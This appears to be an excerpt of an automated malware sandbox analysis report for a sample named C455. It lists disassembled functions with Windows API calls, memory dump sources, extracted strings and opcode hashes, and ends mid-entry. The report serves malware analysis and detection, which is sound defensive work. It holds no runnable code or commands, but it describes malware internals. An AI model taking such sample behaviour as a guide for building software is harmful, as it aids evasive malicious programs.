VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 009F024D

Strings

cess, xrefs: 009F018D
kernel32.dll, xrefs: 009F008F, 009F0095

Memory Dump Source

Source File: 00000001.00000002.2221718420.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9f0000_C455.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: 61c0beff9345d4d30c43a6aeac312f58f61807735dea6f5abac8b0ba57647213
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: B7526874A01229DFDB64CF58C984BACBBB5BF49304F1480D9E94DAB252DB30AE85DF14

Function 0043AB0B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 57
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetForegroundWindow.USER32 ref: 0043AB9F

Strings

ilmn, xrefs: 0043AB7D

Memory Dump Source

Source File: 00000001.00000002.2221393489.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2221393489.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_C455.jbxd

Yara matches

Similarity

API ID: ForegroundWindow
String ID: ilmn
API String ID: 2020703349-1560153188
Opcode ID: 8bf5be419e97d4aeba59362ee4405b63177e9ea72d340c76fc1dbd34a7535713
Instruction ID: 381210f78ea322f673374cf03a2ab6eba84d6d5afac1efb59df7821204f613f6
Opcode Fuzzy Hash: 8bf5be419e97d4aeba59362ee4405b63177e9ea72d340c76fc1dbd34a7535713
Instruction Fuzzy Hash: A0115C3BE5A65087D304DB65D806156B293EAC5214F0DD53DC986D770AEF3DDC028286

Function 00AFB086 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00AFB0AE
Module32First.KERNEL32(00000000,00000224), ref: 00AFB0CE

Memory Dump Source

Source File: 00000001.00000002.2221850742.0000000000AFA000.00000040.00000020.00020000.00000000.sdmp, Offset: 00AFA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_afa000_C455.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 0175424cc1cd1d8f9135e47ad839635ff6c5805a122812f26a0c83b015ccf82b
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: 99F04F311107186FD7303BE5DC89A7B76FCAF49725F100528F656924C0DB70E8464661

Function 009F0E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000400,?,?,009F0223,?,?), ref: 009F0E19
SetErrorMode.KERNELBASE(00000000,?,?,009F0223,?,?), ref: 009F0E1E

Memory Dump Source

Source File: 00000001.00000002.2221718420.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9f0000_C455.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: 0e5b8a931112bee576b3e274b015f74f183d26d529e2547c9a4b8bb33545403c
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: EED0123264522CB7DB002A94DC09BDEBB1CDF09BA2F008421FB0DE9081CBB09A4047EA

Function 0043A950 Relevance: 1.5, APIs: 1, Instructions: 30
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlReAllocateHeap.NTDLL(?,00000000,?,?,?,00000000,0040B65C,00000000,?), ref: 0043A982

Memory Dump Source

Source File: 00000001.00000002.2221393489.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2221393489.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_C455.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 2eba5718b67ec1480271e2bf1c34f5bd19b8968588a838e869f4d5b9ea06510f
Instruction ID: 722538be6ec62bdfb2320af1aff19aeee9eb7e72755357ed04131fae2c05cc9a
Opcode Fuzzy Hash: 2eba5718b67ec1480271e2bf1c34f5bd19b8968588a838e869f4d5b9ea06510f
Instruction Fuzzy Hash: 99E0E576414611FBC6001B24BC06B1B3665AF8A721F02183AF440E6115DA38E811859F

Function 0043AB91 Relevance: 1.5, APIs: 1, Instructions: 18
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetForegroundWindow.USER32 ref: 0043AB9F

Memory Dump Source

Source File: 00000001.00000002.2221393489.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2221393489.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_C455.jbxd

Yara matches

Similarity

API ID: ForegroundWindow
String ID:
API String ID: 2020703349-0
Opcode ID: a0dc0220c6c2ddb49d889c1027b5b2c34b58d9f1c75a0e80b2e5e3c572fe071b
Instruction ID: 60e8b0f46bfb036eff5fe615915129b1fb2bd173e47bf556a6606a5c449cc706
Opcode Fuzzy Hash: a0dc0220c6c2ddb49d889c1027b5b2c34b58d9f1c75a0e80b2e5e3c572fe071b
Instruction Fuzzy Hash: 34E08C7EA406008BDB04DF20EC4A5517766B79A305B084039D903C37A6DB3DD816CA49

Function 00438E70 Relevance: 1.5, APIs: 1, Instructions: 13
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(?,00000000,?,004127C7), ref: 00438E8E

Memory Dump Source

Source File: 00000001.00000002.2221393489.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2221393489.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_C455.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 768fcb1c02373f70ae0863a28d25f36a016012181a68bd02bcb189957d430873
Instruction ID: 85901e1c641484a1e9593b863e702362ecf9fc70d5eef9c3d2e46bbe4163b786
Opcode Fuzzy Hash: 768fcb1c02373f70ae0863a28d25f36a016012181a68bd02bcb189957d430873
Instruction Fuzzy Hash: 63D01235405526EBC6101F24FC06B863A54EF49321F030461B540AF076C734DC908AD8

Function 00438E47 Relevance: 1.5, APIs: 1, Instructions: 9
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(?,00000000), ref: 00438E55

Memory Dump Source

Source File: 00000001.00000002.2221393489.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2221393489.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_C455.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: bde11014aa9fadb2486ac873e4c51e0b14130d9e3c259129d8d0e778167120a1
Instruction ID: 4c59684187f8c9fc8ebab3782fe1e1f4842940d007367fb0e8ab7bd4dbd8a192
Opcode Fuzzy Hash: bde11014aa9fadb2486ac873e4c51e0b14130d9e3c259129d8d0e778167120a1
Instruction Fuzzy Hash: A0C0927C142211FBD2211B21AC5EF6B3E38FB83B63F104124F209580B287649011DA6E

Function 00438E51 Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000), ref: 00438E55

Memory Dump Source

Source File: 00000001.00000002.2221393489.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2221393489.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_C455.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 1129b59f0d67bf13eed9448a42768f07b4682826011a39e0f4462efca5d079f4
Instruction ID: 3dd49d49275fbb255d04589a33f94784ad2ffd24471d3276aa8c957077778349
Opcode Fuzzy Hash: 1129b59f0d67bf13eed9448a42768f07b4682826011a39e0f4462efca5d079f4
Instruction Fuzzy Hash: 8AA0223C002200EBC2200B20AC0EF2B3E38FB83B23F000030F00C080B283308000CA2E

Function 00AFAD45 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 00AFAD96

Memory Dump Source

Source File: 00000001.00000002.2221850742.0000000000AFA000.00000040.00000020.00020000.00000000.sdmp, Offset: 00AFA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_afa000_C455.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: a3c0dd47e9463a76504df2df2221f443f17a6fd9990f7200b02361fb67f0ef7b
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: 7D113C79A00208EFDB01DF98CA85E99BBF5AF08351F058094FA489B362D771EA50DF90

Non-executed Functions

Function 004361E0 Relevance: 32.1, APIs: 10, Strings: 8, Instructions: 636memorycomCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(0043F68C,00000000,00000001,0043F67C), ref: 0043640E
SysAllocString.OLEAUT32(FA46F8B5), ref: 0043646A
CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 004364A7
SysAllocString.OLEAUT32(w!s#), ref: 004364FB
SysAllocString.OLEAUT32(A3q5), ref: 004365A1
VariantInit.OLEAUT32(?), ref: 00436613
VariantClear.OLEAUT32(?), ref: 00436775
SysFreeString.OLEAUT32(?), ref: 004367A0
SysFreeString.OLEAUT32(?), ref: 004367A6
SysFreeString.OLEAUT32(00000000), ref: 004367B3

Strings

C, xrefs: 00436369
BC, xrefs: 00436565
Y/9Q, xrefs: 0043653D
T'g), xrefs: 0043652D
A;, xrefs: 0043643C
w!s#, xrefs: 004364F6, 004364FA
X&c8, xrefs: 0043628F
z7}9A3q5, xrefs: 004365BB

Memory Dump Source

Source File: 00000001.00000002.2221393489.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2221393489.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_C455.jbxd

Yara matches

Similarity

API ID: String$AllocFree$Variant$BlanketClearCreateInitInstanceProxy
String ID: A;$BC$C$T'g)$X&c8$Y/9Q$w!s#$z7}9A3q5
API String ID: 2485776651-4124187736
Opcode ID: 1a7a540a913549243f643d940beb1ec8542d667b59db154e60dd983501a017ec
Instruction ID: 522da010f1620deffab12e26d595bfb80e0736a5a48a815d81ab8756012ad252
Opcode Fuzzy Hash: 1a7a540a913549243f643d940beb1ec8542d667b59db154e60dd983501a017ec
Instruction Fuzzy Hash: 7112EC72A083019BD314CF28C881B6BBBE5FFC9304F15992DF595DB290D778D9058B9A

Function 00A13C9B Relevance: 10.4, Strings: 8, Instructions: 446COMMON

Download Yara Rule

Strings

4%, xrefs: 00A13F3C
>V, xrefs: 00A145BD
IK, xrefs: 00A140EA
UW, xrefs: 00A140FF
>V, xrefs: 00A14417
EG, xrefs: 00A140E3
|~, xrefs: 00A14295
<>, xrefs: 00A14317

Memory Dump Source

Source File: 00000001.00000002.2221718420.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9f0000_C455.jbxd

Yara matches

Similarity

API ID:
String ID: 4%$>V$>V$<>$EG$IK$UW$|~
API String ID: 0-2246970021
Opcode ID: cc1dde96a411e1e6fcd6a59f7ef47bdc2781b26c4dfcad69bf9094ee8fc7f5bd
Instruction ID: 4ba28edbe2fe4a4c66b256c7c3ed3e2468de262ba10ad17656ec8c923f8f3098
Opcode Fuzzy Hash: cc1dde96a411e1e6fcd6a59f7ef47bdc2781b26c4dfcad69bf9094ee8fc7f5bd
Instruction Fuzzy Hash: DC3242B0601B469FDB48CF2AD580389BBB1FF45300F548698C9695FB5ADB35A892CFC0

Function 00423A34 Relevance: 10.4, Strings: 8, Instructions: 446COMMON

Download Yara Rule

Strings

4%, xrefs: 00423CD5
EG, xrefs: 00423E7C
<>, xrefs: 004240B0
|~, xrefs: 0042402E
IK, xrefs: 00423E83
UW, xrefs: 00423E98
>V, xrefs: 004241B0
>V, xrefs: 00424356

Memory Dump Source

Source File: 00000001.00000002.2221393489.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2221393489.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_C455.jbxd

Yara matches

Similarity

API ID:
String ID: 4%$>V$>V$<>$EG$IK$UW$|~
API String ID: 0-2246970021
Opcode ID: cc1dde96a411e1e6fcd6a59f7ef47bdc2781b26c4dfcad69bf9094ee8fc7f5bd
Instruction ID: f89536dd89445c36d0748b7bd4a9cf4b738649ea5c65e76590e6169531de8307
Opcode Fuzzy Hash: cc1dde96a411e1e6fcd6a59f7ef47bdc2781b26c4dfcad69bf9094ee8fc7f5bd
Instruction Fuzzy Hash: C43242B0611B569FDB48CF26D580389BBB1FF45300F548698C9695FB4ADB35A8A2CFC0

Function 00425E90 Relevance: 9.4, APIs: 1, Strings: 4, Instructions: 648COMMON

Download Yara Rule

Strings

@iB, xrefs: 0042693A, 00426DD8, 00426E0E
V3R5, xrefs: 00426774
*mB, xrefs: 00426D24
67, xrefs: 0042677F

Memory Dump Source

Source File: 00000001.00000002.2221393489.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2221393489.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_C455.jbxd

Yara matches

Similarity

API ID:
String ID: *mB$67$@iB$V3R5
API String ID: 0-119712241
Opcode ID: 2752cfb5aefe83a77e1e275bbb3611267d68b1f03f1cd38cb6bb80b62f128883
Instruction ID: f8f986030c5c516667fa2fb6bcf2798bb7f33b75dff4277953ef0512ab11a316
Opcode Fuzzy Hash: 2752cfb5aefe83a77e1e275bbb3611267d68b1f03f1cd38cb6bb80b62f128883
Instruction Fuzzy Hash: 6A2258716083548BC728DF68E85176FB7E1EFC5304F49893DE9868B392EB349905CB86

Function 004205B0 Relevance: 8.0, Strings: 6, Instructions: 481COMMON

Download Yara Rule

Strings

<k;m, xrefs: 0042069D
wy, xrefs: 00420675
&', xrefs: 00420966
2g1i, xrefs: 00420695
B, xrefs: 00420ADF
0c=e, xrefs: 0042068D

Memory Dump Source

Source File: 00000001.00000002.2221393489.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2221393489.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_C455.jbxd

Yara matches

Similarity

API ID:
String ID: &'$0c=e$2g1i$<k;m$B$wy
API String ID: 0-2430453506
Opcode ID: eb1d602c92fd99bd83cb42d187dbb3c1cba3f1d687f489207edda56632bda968
Instruction ID: efc43d6a55d29c5113b9513135886848320c4b4fba7a0b6b3d57c2edb9ba0087
Opcode Fuzzy Hash: eb1d602c92fd99bd83cb42d187dbb3c1cba3f1d687f489207edda56632bda968
Instruction Fuzzy Hash: 26D127B56083118BD724DF25D85276BB7F2EFE2314F58992CE4828B3A5F7789801CB46

Function 00A1C8B1 Relevance: 7.8, Strings: 6, Instructions: 346COMMON

Download Yara Rule

Strings

5, xrefs: 00A1CB84
&=, xrefs: 00A1CC7F
zJyL, xrefs: 00A1CDB0
0, xrefs: 00A1CB22
D@6T, xrefs: 00A1CC69
EF, xrefs: 00A1CDD1

Memory Dump Source

Source File: 00000001.00000002.2221718420.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9f0000_C455.jbxd

Yara matches

Similarity

API ID:
String ID: &=$0$5$D@6T$EF$zJyL
API String ID: 0-3264166258
Opcode ID: 6f787935f52e1d9f41ee2cdf27def6dc2193743486b37ecbc705986605444a77
Instruction ID: c35d7f42c20f0be16d434dd053aaad9d877c9939d0b6e145a9b52dd94e4f39ef
Opcode Fuzzy Hash: 6f787935f52e1d9f41ee2cdf27def6dc2193743486b37ecbc705986605444a77
Instruction Fuzzy Hash: C9B1F77014C3818FE328CF2984917BBBBE2AFD2314F288A6DD4D98B291DB748549C757

Function 0042C64A Relevance: 7.8, Strings: 6, Instructions: 346COMMON

Download Yara Rule

Strings

5, xrefs: 0042C91D
0, xrefs: 0042C8BB
&=, xrefs: 0042CA18
D@6T, xrefs: 0042CA02
EF, xrefs: 0042CB6A
zJyL, xrefs: 0042CB49

Memory Dump Source

Source File: 00000001.00000002.2221393489.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2221393489.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_C455.jbxd

Yara matches

Similarity

API ID:
String ID: &=$0$5$D@6T$EF$zJyL
API String ID: 0-3264166258
Opcode ID: 6f787935f52e1d9f41ee2cdf27def6dc2193743486b37ecbc705986605444a77
Instruction ID: f15181a2a9622c2e50c414abf7a3ac4626398852fa6a8a653e4f6d86baaa0204
Opcode Fuzzy Hash: 6f787935f52e1d9f41ee2cdf27def6dc2193743486b37ecbc705986605444a77
Instruction Fuzzy Hash: 62B1087020C3918AE324CF2994917BFBBD2AFD6304F588A6ED4D987391DB788449C757

Function 009F89F7 Relevance: 7.6, APIs: 5, Instructions: 146threadCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 009F8A1B
GetCurrentThreadId.KERNEL32 ref: 009F8A25
SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 009F8AC2
GetForegroundWindow.USER32 ref: 009F8AD7
ExitProcess.KERNEL32 ref: 009F8BD9

Memory Dump Source

Source File: 00000001.00000002.2221718420.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9f0000_C455.jbxd

Yara matches

Similarity

API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
String ID:
API String ID: 4063528623-0
Opcode ID: 7b623bcc5e135466e494fc7f4101763bd35fdd0b5e674fc8217798d0a0a97a45
Instruction ID: 1e0f4314e4f00e548d5e3687078b7166540abdd3a3c4ce89b86555285e9ce1f8
Opcode Fuzzy Hash: 7b623bcc5e135466e494fc7f4101763bd35fdd0b5e674fc8217798d0a0a97a45
Instruction Fuzzy Hash: D5417E77F4431807D71CAE78DC5A37BB69A9BC4314F09803E6A85AB390DD795C0593C1

Function 00422E93 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 394COMMON

Download Yara Rule

Strings

X9{;, xrefs: 0042330B
r1B, xrefs: 00423169
)*, xrefs: 00423216

Memory Dump Source

Source File: 00000001.00000002.2221393489.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2221393489.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_C455.jbxd

Yara matches

Similarity

API ID:
String ID: )*$X9{;$r1B
API String ID: 0-1001561910
Opcode ID: 8dd660af85e9b30ff04e02c10e609101b9a09426abdb28fd85c75e4d1b9bc82c
Instruction ID: a1479a56b64214e2a7fc54a03e2bd96b94a4879ed58cb61811aa9170273c6ab6
Opcode Fuzzy Hash: 8dd660af85e9b30ff04e02c10e609101b9a09426abdb28fd85c75e4d1b9bc82c
Instruction Fuzzy Hash: 94D1BAB06083419FD3009F59E88166BBBE0FF96309F54892DF5818B351E3B8DA09CB5A

Function 0041BEA0 Relevance: 6.9, Strings: 5, Instructions: 684COMMON

Download Yara Rule

Strings

de, xrefs: 0041C34D
C\, xrefs: 0041C1F0
Iz, xrefs: 0041C15F
-, xrefs: 0041C167
[^, xrefs: 0041C1E8

Memory Dump Source

Source File: 00000001.00000002.2221393489.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2221393489.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_C455.jbxd

Yara matches

Similarity

API ID:
String ID: -$C\$Iz$[^$de
API String ID: 0-3020956940
Opcode ID: f819af1d85e380cc0a90eb61a19dfdbbe2cdd3936953633e8d3f19afdb44e2e0
Instruction ID: e1ce7c89e45d16bcd91c54bb6943d2a9f79ffbc50f6667256eaf7ee8aaf95e0a
Opcode Fuzzy Hash: f819af1d85e380cc0a90eb61a19dfdbbe2cdd3936953633e8d3f19afdb44e2e0
Instruction Fuzzy Hash: C012237654C3108FC314CFA8C8926ABBBE2EFD5314F18892DE4E58B391E7789505CB86

Function 00A10817 Relevance: 6.7, Strings: 5, Instructions: 481COMMON

Download Yara Rule

Strings

wy, xrefs: 00A108DC
2g1i, xrefs: 00A108FC
&', xrefs: 00A10BCD
<k;m, xrefs: 00A10904
0c=e, xrefs: 00A108F4

Memory Dump Source

Source File: 00000001.00000002.2221718420.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9f0000_C455.jbxd

Yara matches

Similarity

API ID:
String ID: &'$0c=e$2g1i$<k;m$wy
API String ID: 0-3335612808
Opcode ID: eb1d602c92fd99bd83cb42d187dbb3c1cba3f1d687f489207edda56632bda968
Instruction ID: 0530d664f5bcbeff17e9de3a6b5eeb66c6bc05ecc9b022d81782bca7362410cc
Opcode Fuzzy Hash: eb1d602c92fd99bd83cb42d187dbb3c1cba3f1d687f489207edda56632bda968
Instruction Fuzzy Hash: 5BD1F8B5608301CBD724DF25C851BAB77F2FF92354F18996CD4828B394E7B99881CB52

Function 00A1C94B Relevance: 6.6, Strings: 5, Instructions: 336COMMON

Download Yara Rule

Strings

5, xrefs: 00A1CB84
&=, xrefs: 00A1CC7F
zJyL, xrefs: 00A1CDB0
D@6T, xrefs: 00A1CC69
EF, xrefs: 00A1CDD1

Memory Dump Source

Source File: 00000001.00000002.2221718420.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9f0000_C455.jbxd

Yara matches

Similarity

API ID:
String ID: &=$5$D@6T$EF$zJyL
API String ID: 0-923305466
Opcode ID: f99561a0788cee97c829df764e2ebd4c7b90c8b56b0bfd503a4f7d65a1aead45
Instruction ID: ce8dab1052aecd3d2a141027c586946534dc5c70b9ce804d773749f0a6577221
Opcode Fuzzy Hash: f99561a0788cee97c829df764e2ebd4c7b90c8b56b0bfd503a4f7d65a1aead45
Instruction Fuzzy Hash: 7EA1077014C3818FE368CF2984917EBBBD2AFD2314F288A6DD4DA8B291DB748449C757

Function 0042C6E4 Relevance: 6.6, Strings: 5, Instructions: 336COMMON

Download Yara Rule

Strings

5, xrefs: 0042C91D
&=, xrefs: 0042CA18
D@6T, xrefs: 0042CA02
EF, xrefs: 0042CB6A
zJyL, xrefs: 0042CB49

Memory Dump Source

Source File: 00000001.00000002.2221393489.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2221393489.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_C455.jbxd

Yara matches

Similarity

API ID:
String ID: &=$5$D@6T$EF$zJyL
API String ID: 0-923305466
Opcode ID: f99561a0788cee97c829df764e2ebd4c7b90c8b56b0bfd503a4f7d65a1aead45
Instruction ID: a1ece66a1846d5f05b18afa13e78785737907ef84dba56bd06699bfcf49e878d
Opcode Fuzzy Hash: f99561a0788cee97c829df764e2ebd4c7b90c8b56b0bfd503a4f7d65a1aead45
Instruction Fuzzy Hash: 16A1097120C3918AE364CF2994917AFBBD2AFD2304F588A6ED4C987391DB788449C757

Function 00A1C99C Relevance: 6.6, Strings: 5, Instructions: 335COMMON

Download Yara Rule

Strings

5, xrefs: 00A1CB84
&=, xrefs: 00A1CC7F
zJyL, xrefs: 00A1CDB0
D@6T, xrefs: 00A1CC69
EF, xrefs: 00A1CDD1

Memory Dump Source

Source File: 00000001.00000002.2221718420.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9f0000_C455.jbxd

Yara matches

Similarity

API ID:
String ID: &=$5$D@6T$EF$zJyL
API String ID: 0-923305466
Opcode ID: 5eea70b87afb6f6764b4b0a803c2ee816a1ddf72bf9f3ac6a73094afb86f43b5
Instruction ID: 9a383505960dce75437d116ddc31f6ca5044d3363f536c2160bc0fe15946e31c
Opcode Fuzzy Hash: 5eea70b87afb6f6764b4b0a803c2ee816a1ddf72bf9f3ac6a73094afb86f43b5
Instruction Fuzzy Hash: 2FA1F87014C3818FE368CF2984917EBBBD2AFD2314F288A6DD4DA8B291DB748549C757

Function 0042C735 Relevance: 6.6, Strings: 5, Instructions: 335COMMON

Download Yara Rule

Strings

5, xrefs: 0042C91D
&=, xrefs: 0042CA18
D@6T, xrefs: 0042CA02
EF, xrefs: 0042CB6A
zJyL, xrefs: 0042CB49

Memory Dump Source

Source File: 00000001.00000002.2221393489.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2221393489.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_C455.jbxd

Yara matches

Similarity

API ID:
String ID: &=$5$D@6T$EF$zJyL
API String ID: 0-923305466
Opcode ID: 5eea70b87afb6f6764b4b0a803c2ee816a1ddf72bf9f3ac6a73094afb86f43b5
Instruction ID: a1affb31d16800ef8c6cc435bb9674081fedb8b39f933f67ef20babcac88fb25
Opcode Fuzzy Hash: 5eea70b87afb6f6764b4b0a803c2ee816a1ddf72bf9f3ac6a73094afb86f43b5
Instruction Fuzzy Hash: 6BA1097020C3918AE324CF2994D17AFBBD2AFD2304F688A6ED4D987391DB788449C757

Function 00A1C98D Relevance: 6.6, Strings: 5, Instructions: 312COMMON

Download Yara Rule

Strings

5, xrefs: 00A1CB84
&=, xrefs: 00A1CC7F
zJyL, xrefs: 00A1CDB0
D@6T, xrefs: 00A1CC69
EF, xrefs: 00A1CDD1

Memory Dump Source

Source File: 00000001.00000002.2221718420.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9f0000_C455.jbxd

Yara matches

Similarity

API ID:
String ID: &=$5$D@6T$EF$zJyL
API String ID: 0-923305466
Opcode ID: 964c76fda7f37207e59e987132c18f71186e6d03fd2999a299809d292455ad42
Instruction ID: 27b749f67e86d136361f7d3b034ab58fefd76eb203c4ef5dc1c9af48285fc891
Opcode Fuzzy Hash: 964c76fda7f37207e59e987132c18f71186e6d03fd2999a299809d292455ad42
Instruction Fuzzy Hash: C6A1F57014C3818EE324CF2994917EBBBD2AFE2314F288A6DD4D98B291DB748449C757

Function 0042C726 Relevance: 6.6, Strings: 5, Instructions: 312COMMON

Download Yara Rule

Strings

5, xrefs: 0042C91D
&=, xrefs: 0042CA18
D@6T, xrefs: 0042CA02
EF, xrefs: 0042CB6A
zJyL, xrefs: 0042CB49

Memory Dump Source

Source File: 00000001.00000002.2221393489.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2221393489.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_C455.jbxd

Yara matches

Similarity

API ID:
String ID: &=$5$D@6T$EF$zJyL
